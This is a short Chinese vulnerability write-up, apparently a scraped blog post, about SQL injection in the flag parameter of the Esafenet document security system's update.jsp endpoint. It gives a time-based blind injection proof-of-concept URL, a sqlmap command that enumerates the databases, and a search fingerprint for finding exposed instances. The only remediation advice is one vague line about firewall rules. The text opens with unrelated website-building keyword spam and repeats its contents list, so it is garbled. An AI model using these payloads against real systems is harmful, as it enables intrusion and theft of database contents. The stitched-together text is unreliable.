建设官方网站企业网银登录,青岛企业网站建设优化,网站建设的目的包含哪些方面,建筑行业网目录
0x01 漏洞介绍
0x02 影响产品
0x03 语法特征
0x04 漏洞复现页面
0x05 漏洞修复建议 0x01 漏洞介绍
亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一#xff0c;保护范围涵盖终端电脑#xff08;Windows、Mac、Linux系统平台#…目录
0x01 漏洞介绍
0x02 影响产品
0x03 语法特征
0x04 漏洞复现页面
0x05 漏洞修复建议 0x01 漏洞介绍
亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一保护范围涵盖终端电脑Windows、Mac、Linux系统平台、智能终端Android、IOS及各类应用系统OA、知识管理、文档管理、项目管理、PDM等。该漏洞存在与/update接口下flag对输入的数据没有进行严格的过滤而导致SQL注入攻击者可以利用该漏洞获取数据库敏感信息。
0x02 影响产品 亿赛通电子文档安全管理系统
0x03 语法特征 app亿赛通-电子文档安全管理系统
0x04 漏洞复现页面 POC CDGServer3/workflowE/useractivate/update.jsp?flag1ids1,3);WAITFOR%20DELAY%20%270:0:值%27--
修改值的大小 对应延迟时间 python3 sqlmap.py -u https://xxxxx/CDGServer3/workflowE/useractiv ate/update.jsp?flag1ids1,3) --batch --dbs 0x05 漏洞修复建议
设置防火墙规则过滤漏洞相关的敏感链接监测 没看够~欢迎关注扫一扫~